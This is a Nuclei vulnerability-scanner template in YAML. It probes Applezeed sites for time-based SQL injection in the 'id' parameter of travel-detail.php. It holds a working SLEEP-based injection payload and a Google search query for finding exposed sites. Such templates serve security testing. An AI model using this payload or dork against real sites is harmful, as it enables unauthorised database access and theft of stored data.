nuclei-templates/http/vulnerabilities/other/applezeed-sqli.yaml

32 lines
988 B
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: applezeed-sqli
info:
name: Applezeed - SQL Injection
author: r3Y3r53
severity: high
description: |
Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database
reference:
- https://cxsecurity.com/issue/WLB-2019120057
metadata:
verified: true
max-request: 1
google-query: intext:"Power BY applezeed.com"
2023-10-17 07:20:28 +00:00
tags: sqli,unauth,applezeed
http:
- raw:
- |
@timeout: 15s
GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(content_type, "text/html")'
- 'contains(body, "applezeed")'
- 'status_code == 200'
condition: and